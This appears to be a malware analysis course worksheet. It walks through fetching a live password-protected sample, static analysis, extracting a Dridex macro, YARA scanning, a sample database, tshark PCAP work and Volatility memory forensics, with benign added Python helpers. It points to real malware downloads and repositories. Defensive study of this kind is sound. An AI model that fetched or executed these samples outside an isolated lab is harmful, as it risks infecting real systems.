############################
# Download the Analysis VM #
############################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts
- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
- After logging in please open a terminal window and type the following commands:
cd Desktop/
- This is actual malware (remember to run it in a VM - the password to extract it is 'infected'):
cd /home/infosecaddicts/Desktop/
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate
unzip malware-password-is-infected.zip
infected
file malware.exe
mv malware.exe malware.pdf
file malware.pdf
mv malware.pdf malware.exe
hexdump -n 2 -C malware.exe
***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html
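The rename-and-check steps above make the point that `file` looks at the first bytes, not the extension. Here is an added Python 3 example (not part of the original course material) that does the same thing: it matches a few leading-byte signatures and, for an MZ file, follows the e_lfanew pointer at offset 0x3C to the PE signature and COFF header, which is where `objdump -x` gets its machine type and section count. The signature table and the sample PE blob are constructed for the demo; the real malware.exe is not needed.

```python
import struct

# Constructed signature table: a small subset of the kind of list kept at
# garykessler.net/library/file_sigs.html. All of these sit at offset 0.
SIGNATURES = [
    (b"MZ", "DOS/Windows executable (MZ)"),
    (b"%PDF-", "PDF document"),
    (b"PK\x03\x04", "ZIP archive (also docx/xlsx/jar)"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (doc/xls/msi)"),
    (b"\x7fELF", "ELF executable"),
]


def identify(data: bytes) -> str:
    """Name a file type from its leading bytes; the extension is never consulted,
    which is why renaming malware.exe to malware.pdf does not change what `file` says."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return "unknown"


def pe_header_offset(data: bytes):
    """Follow e_lfanew (the DWORD at DOS-header offset 0x3C) to the 'PE\\0\\0' signature.
    Returns that offset, or None when the data is not an MZ file or the pointer is bogus."""
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return e_lfanew


def pe_summary(data: bytes):
    """Read the COFF file header that follows the PE signature: machine type,
    section count and link timestamp (the first things `objdump -x` prints)."""
    off = pe_header_offset(data)
    if off is None or off + 24 > len(data):
        return None
    machine, nsections, timestamp = struct.unpack_from("<HHI", data, off + 4)
    return {"machine": hex(machine), "sections": nsections, "timestamp": timestamp}


def build_sample_pe() -> bytes:
    """Constructed stand-in for malware.exe: a DOS header pointing at a PE signature
    and a COFF header for i386 with 3 sections. It contains no code at all."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)          # e_lfanew -> PE header at 0x80
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0x5A0B1E2D, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\x00\x00" + coff


if __name__ == "__main__":
    sample = build_sample_pe()
    print(sample[:2].hex(" "), identify(sample))   # the same '4d 5a' hexdump shows
    print(pe_summary(sample))
    print(identify(b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"))
```

A bogus or out-of-range e_lfanew is a common trick in malformed samples, so the function refuses to trust it rather than raising; the `file` utility behaves the same way and falls back to "MS-DOS executable".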
objdump -x malware.exe
strings malware.exe
strings --all malware.exe | head -n 6
strings malware.exe | grep -i dll
strings malware.exe | grep -i library
strings malware.exe | grep -i reg
strings malware.exe | grep -i hkey
strings malware.exe | grep -i hku
- We didn't see anything like HKLM, HKCU or other registry type stuff
strings malware.exe | grep -i irc
strings malware.exe | grep -i join
strings malware.exe | grep -i admin
strings malware.exe | grep -i list
- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
sudo apt-get install -y python-pefile
malware
vi analyse_malware.py
python analyse_malware.py malware.exe
Building a Malware Scanner
--------------------------
mkdir /Desktop/malwarescanner
cd /Desktop/malwarescanner
wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
unzip master.zip
cd malwarescanner-master/
python scanner.py -h
cat strings.txt
cat hashes.txt
mkdir /Desktop/malcode
cp /Desktop/malware.exe /Desktop/malcode
python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt
cd /Desktop/
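The scanner.py run above takes a hash list and a string list and walks a directory. This added Python 3 example (not the jonahbaron/malwarescanner code) shows the two checks it has to make: hash every file in chunks and compare against the known-bad list, and search the raw bytes for each indicator string. `demo()` builds a temporary directory with one constructed "malicious" file and one benign file, writes hashes.txt and strings.txt in the one-entry-per-line format such tools expect, and returns the hits; names and file contents are all constructed.

```python
import hashlib
import os
import tempfile


def load_list(path):
    """Read one indicator per line, skipping blanks and '#' comments."""
    with open(path) as f:
        return [ln.strip() for ln in f if ln.strip() and not ln.startswith("#")]


def hash_file(path):
    """md5/sha1/sha256 of a file, read in chunks so large samples do not need to fit in memory."""
    digests = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            for d in digests.values():
                d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}


def scan_directory(directory, known_hashes, indicator_strings):
    """Report every file that matches a known hash (any algorithm) or contains an indicator string."""
    known = {h.lower() for h in known_hashes}
    results = []
    for root, _, files in os.walk(directory):
        for name in sorted(files):
            path = os.path.join(root, name)
            digests = hash_file(path)
            with open(path, "rb") as f:
                data = f.read()
            hash_hits = [alg for alg, hx in digests.items() if hx in known]
            string_hits = [s for s in indicator_strings if s.encode() in data]
            if hash_hits or string_hits:
                results.append({"file": name, "sha256": digests["sha256"],
                                "hash_hits": hash_hits, "string_hits": string_hits})
    return results


def demo():
    """Constructed run: a malcode/ dir with one flagged file and one benign file."""
    with tempfile.TemporaryDirectory() as tmp:
        malcode = os.path.join(tmp, "malcode")
        os.mkdir(malcode)
        bad = b"MZ\x90\x00constructed sample\x00JOIN #bots\x00"
        with open(os.path.join(malcode, "sample.bin"), "wb") as f:
            f.write(bad)
        with open(os.path.join(malcode, "readme.txt"), "wb") as f:
            f.write(b"nothing to see here\n")
        hashes_txt = os.path.join(tmp, "hashes.txt")
        with open(hashes_txt, "w") as f:
            f.write("# constructed known-bad list\n" + hashlib.sha256(bad).hexdigest() + "\n")
        strings_txt = os.path.join(tmp, "strings.txt")
        with open(strings_txt, "w") as f:
            f.write("JOIN #\nPRIVMSG\n")
        return scan_directory(malcode, load_list(hashes_txt), load_list(strings_txt))


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Hash lists are compared case-insensitively because vendors publish digests in both cases; a string list, on the other hand, is matched as raw bytes, so a UTF-16 string in the sample will not match an ASCII entry unless you add the encoded form too.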
#####################################################
# Analyzing Macro Embedded Malware #
# Reference: #
# https://jon.glass/analyzes-dridex-malware-p1/ #
#####################################################
cp /Desktop/
- Create a FREE account on:
https://malwr.com/account/signup/
- Grab the malware from:
https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
file /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
cat /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
sudo pip install olefile
malware
mkdir /Desktop/oledump
cd /Desktop/oledump
wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
unzip oledump_V0_0_22.zip
cp /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
-----------------------------------------------------------------------------------------------------------------------------------
sudo pip install olefile
malware
mkdir /Desktop/oledump
cd /Desktop/oledump
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip
unzip 064016.zip
infected
python oledump.py 064016.doc
python oledump.py 064016.doc -s A4 -v
- From this we can see this Word document contains an embedded file called editdata.mso which contains 7 data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.
python oledump.py 064016.doc -s A5 -v
- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
python oledump.py 064016.doc -s A3 -v
- Look for "GVhkjbjv" and you should see:
- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
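Pasting the blob into a web converter works once; the added Python 3 example below (my code, not part of the course or oledump) does the same job on the whole macro source so it can be repeated. It rejoins VBA literals split with `" & "` (and `_` line continuations), finds every run of eight or more hex bytes, decodes it, and keeps only blobs whose bytes are mostly printable, which filters out long decimal numbers that happen to be valid hex. `SAMPLE_MACRO` is a constructed stand-in for the Module1 source; the blob in it starts with 636D and ends with 653B like the one on the page, but decodes to a harmless constructed command.

```python
import re

# Eight or more contiguous hex bytes; shorter runs are usually ordinary numbers.
HEX_RUN = re.compile(r"(?:[0-9A-Fa-f]{2}){8,}")
# VBA habit of splitting one literal as "..." & "...", optionally with a _ continuation.
VBA_CONCAT = re.compile(r'"\s*&\s*_?\s*"')


def decode_hex(hexstr: str):
    """Return (text, printable_ratio); non-printable bytes are shown as '.'."""
    raw = bytes.fromhex(hexstr)
    printable = sum(1 for b in raw if 0x20 <= b < 0x7F or b in (9, 10, 13))
    text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)
    return text, printable / len(raw)


def find_hex_blobs(source: str, min_printable: float = 0.8):
    """Locate and decode hex-encoded strings in macro source text."""
    joined = VBA_CONCAT.sub("", source)      # "636D" & "64" -> "636D64"
    blobs = []
    for m in HEX_RUN.finditer(joined):
        text, ratio = decode_hex(m.group())
        if ratio >= min_printable:
            blobs.append({"offset": m.start(), "hex": m.group(), "decoded": text})
    return blobs


# Constructed macro source: one split hex literal and one decoy 16-digit number.
SAMPLE_MACRO = '''Sub AutoOpen()
    Dim GVhkjbjv As String
    Dim decoy As Double
    decoy = 1234567890123456
    GVhkjbjv = "636D64202F6320" & _
               "7479706520" & "6E6F74653B"
    Call Run(GVhkjbjv)
End Sub
'''

if __name__ == "__main__":
    for blob in find_hex_blobs(SAMPLE_MACRO):
        print(f"@{blob['offset']}: {blob['hex'][:12]}... -> {blob['decoded']!r}")
```

The decoy number survives the regex (sixteen digits is eight valid hex bytes) but fails the printable-ratio check, so only the real blob is reported. Lower `min_printable` when you expect binary payloads rather than command strings.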
##############
# Yara Ninja #
##############
sudo apt-get remove -y yara
malware
wget https://github.com/plusvic/yara/archive/v3.4.0.zip
sudo apt-get -y install libtool
malware
unzip v3.4.0.zip
cd yara-3.4.0
./bootstrap.sh
./configure
make
sudo make install
malware
yara -v
cd ..
wget https://github.com/Yara-Rules/rules/archive/master.zip
unzip master.zip
cd /Desktop
yara rules-master/packer.yar malcode/malware.exe
Places to get more Yara rules:
------------------------------
https://malwareconfig.com/static/yaraRules/
https://github.com/kevthehermit/YaraRules
https://github.com/VectraThreatLab/reyara
Yara rule sorting script:
-------------------------
https://github.com/mkayoh/yarasorter
cd /Desktop/rules-master
for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
cd /Desktop/
yara rules-master/master.yar malcode/malware.exe
Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
http://derekmorton.name/files/malware_12-14-12.sql.bz2
Malware Repositories:
http://malshare.com/index.php
http://www.malwareblacklist.com/
http://www.virusign.com/
http://virusshare.com/
http://www.tekdefense.com/downloads/malware-samples/
###############################
# Creating a Malware Database #
###############################
Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
malware
wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip
unzip malware-password-is-infected.zip
infected
python avsubmit.py --init
python avsubmit.py -f malware.exe -e
Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing MySQL database
- Run the following command in the terminal:
sudo apt-get install mysql-server
malware
- Step 2: Installing Python MySQLdb module
- Run the following command in the terminal:
sudo apt-get build-dep python-mysqldb
malware
sudo apt-get install python-mysqldb
malware
Step 3: Logging in
Run the following command in the terminal:
mysql -u root -p (set a password of 'malware')
- Then create one database by running the following command:
create database malware;
exit;
wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
vi mal_to_db.py (fill in database connection information)
python mal_to_db.py -i
------- check it to see if the files table was created ------
mysql -u root -p
malware
show databases;
use malware;
show tables;
describe files;
exit;
---------------------------------
- Now add the malicious file to the DB
python mal_to_db.py -f malware.exe -u
- Now check to see if it is in the DB
mysql -u root -p
malware
mysql> use malware;
select id,md5,sha1,sha256,time FROM files;
mysql> quit;
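Both the sqlite (avsubmit.py) and MySQL (mal_to_db.py) sections end with the same check: a `files` table with id, md5, sha1, sha256 and time columns, and a SELECT to confirm the sample went in. This added Python 3 example (not avsubmit.py or mal_to_db.py) implements that table in sqlite3 from the standard library, so it runs without a server; the schema, column names and the `list_files` query mirror the SELECT above, and the sha256 column is UNIQUE so submitting the same bytes twice returns the existing row instead of creating a duplicate. The sample bytes are constructed.

```python
import hashlib
import sqlite3
import time

SCHEMA = """
CREATE TABLE IF NOT EXISTS files (
    id       INTEGER PRIMARY KEY AUTOINCREMENT,
    filename TEXT NOT NULL,
    size     INTEGER NOT NULL,
    md5      TEXT NOT NULL,
    sha1     TEXT NOT NULL,
    sha256   TEXT NOT NULL UNIQUE,
    time     TEXT NOT NULL
)"""


def init_db(path=":memory:"):
    """Create the files table (use a real path instead of :memory: to keep the DB)."""
    conn = sqlite3.connect(path)
    conn.execute(SCHEMA)
    conn.commit()
    return conn


def add_sample(conn, filename, data):
    """Hash and insert a sample. Returns (id, inserted); a repeat submission of the
    same bytes is ignored thanks to the UNIQUE sha256 and the existing id is returned."""
    digests = {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}
    cur = conn.execute(
        "INSERT OR IGNORE INTO files (filename, size, md5, sha1, sha256, time) "
        "VALUES (?, ?, ?, ?, ?, ?)",
        (filename, len(data), digests["md5"], digests["sha1"], digests["sha256"],
         time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())))
    conn.commit()
    if cur.rowcount == 1:
        return cur.lastrowid, True
    row = conn.execute("SELECT id FROM files WHERE sha256 = ?", (digests["sha256"],)).fetchone()
    return row[0], False


def lookup(conn, digest):
    """Find a sample by md5, sha1 or sha256 hex; the column is chosen from a fixed
    whitelist by digest length, and the value itself is always bound as a parameter."""
    column = {32: "md5", 40: "sha1", 64: "sha256"}.get(len(digest))
    if column is None:
        raise ValueError("digest must be md5, sha1 or sha256 hex")
    return conn.execute(f"SELECT id, filename, sha256 FROM files WHERE {column} = ?",
                        (digest.lower(),)).fetchone()


def list_files(conn):
    """The same check as `select id,md5,sha1,sha256,time FROM files;` above."""
    return conn.execute("SELECT id, md5, sha1, sha256, time FROM files ORDER BY id").fetchall()


if __name__ == "__main__":
    db = init_db()
    print(add_sample(db, "malware.exe", b"MZ\x90\x00constructed sample bytes"))
    print(add_sample(db, "malware-copy.exe", b"MZ\x90\x00constructed sample bytes"))
    for row in list_files(db):
        print(row)
```

Keying the table on sha256 rather than md5 matters for a malware corpus: md5 collisions are cheap to produce, so two different samples can share an md5 while their sha256 values still differ.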
#################
# PCAP Analysis #
#################
cd /home/infosecaddicts/Desktop/Browser\ Forensics
ls | grep pcap
perl chaosreader.pl suspicious-time.pcap
firefox index.html
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
malware
for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
#############################
# PCAP Analysis with tshark #
#############################
tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
tshark -r suspicious-time.pcap -qz ip_hosts,tree
tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
whois rapidshare.com.eyu32.ru
whois sploitme.com.cn
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
tshark -r suspicious-time.pcap -qz http_req,tree
tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
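The last three tshark pipelines take the `-T fields` output (ip.src, ip.dst, http.host, http.request.uri, tab separated), drop images/CSS/icons and known-good hosts, narrow to one client, and trim query strings so each script shows up once. This added Python 3 example (my code, not from the course) does the same over a few constructed output lines so the logic can be tested offline; it also counts which hosts each client talked to, which is the quickest way to spot a single victim fetching from several suspicious domains. It generalizes the page's sed slightly by trimming every query string rather than only some. The client 10.0.3.15 and the two hosts are the ones named on the page; the server addresses and URIs are made up.

```python
from collections import Counter, defaultdict

NOISE_PATHS = ("/image", ".css", ".ico")          # the grep -v list above
NOISE_HOSTS = ("google", "honeynet.org")


def parse_tshark_fields(text):
    """Parse `tshark -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri` output."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t")
        if len(parts) != 4:       # tshark still emits 4 columns when Host is missing (empty field)
            continue
        src, dst, host, uri = parts
        records.append({"src": src, "dst": dst, "host": host, "uri": uri})
    return records


def is_noise(rec):
    return any(p in rec["uri"] for p in NOISE_PATHS) or any(h in rec["host"] for h in NOISE_HOSTS)


def trim_query(uri):
    """Keep only the path, as the sed above does, so one line per script rather than per request."""
    path, sep, _ = uri.partition("?")
    return path + ("?..." if sep else "")


def summarize(records, client=None):
    """Lines in the `src -> dst : http://host/path` format of the awk above."""
    lines = []
    for rec in records:
        if is_noise(rec) or (client and rec["src"] != client):
            continue
        lines.append(f'{rec["src"]} -> {rec["dst"]} : http://{rec["host"]}{trim_query(rec["uri"])}')
    return lines


def hosts_by_client(records):
    """For each client, how many non-noise requests went to each host."""
    out = defaultdict(Counter)
    for rec in records:
        if not is_noise(rec):
            out[rec["src"]][rec["host"]] += 1
    return {src: dict(c) for src, c in out.items()}


# Constructed tshark output (tab separated); server addresses are documentation ranges.
SAMPLE = "\n".join([
    "10.0.3.15\t192.0.2.10\trapidshare.com.eyu32.ru\t/login.php?user=abc&id=7",
    "10.0.3.15\t192.0.2.10\trapidshare.com.eyu32.ru\t/images/logo.gif",
    "10.0.3.15\t192.0.2.10\trapidshare.com.eyu32.ru\t/style.css",
    "10.0.3.15\t198.51.100.7\tsploitme.com.cn\t/?click=3feb5a6b2f",
    "10.0.3.15\t198.51.100.7\tsploitme.com.cn\t/fg/show.php?s=3feb5a6b2f",
    "10.0.3.15\t203.0.113.5\twww.google.com\t/search?q=rapidshare",
    "10.0.3.20\t192.0.2.10\trapidshare.com.eyu32.ru\t/login.php?user=xyz",
])

if __name__ == "__main__":
    recs = parse_tshark_fields(SAMPLE)
    print("\n".join(summarize(recs, client="10.0.3.15")))
    print(hosts_by_client(recs))
```

Feed it real data with `tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri` piped into a file (`-Y` is the display-filter option in current tshark; the `-R` form above is from older releases).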
######################################
# PCAP Analysis with forensicPCAP.py #
######################################
cd /Desktop
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
sudo easy_install cmd2
malware
python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
ForPCAP >>> help
Prints stats about the PCAP
ForPCAP >>> stat
Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be used with the "show" command.
ForPCAP >>> dns
ForPCAP >>> show
Prints all destination ports from the PCAP file. The id before each entry is the packet's id which can be used with the "show" command.
ForPCAP >>> dstports
ForPCAP >>> show
Prints the number of IP sources and stores them.
ForPCAP >>> ipsrc
ForPCAP >>> show
Prints the number of web requests and stores them
ForPCAP >>> web
ForPCAP >>> show
Prints the number of mail requests and stores them
ForPCAP >>> mail
ForPCAP >>> show
###################
# Memory Analysis #
###################
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility
python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
***Takes a few minutes***
strings 1752.dmp | grep "^http://" | sort | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object 11 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
cat malicious.js
*****Sorry - no time to cover javascript de-obfuscation today*****
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done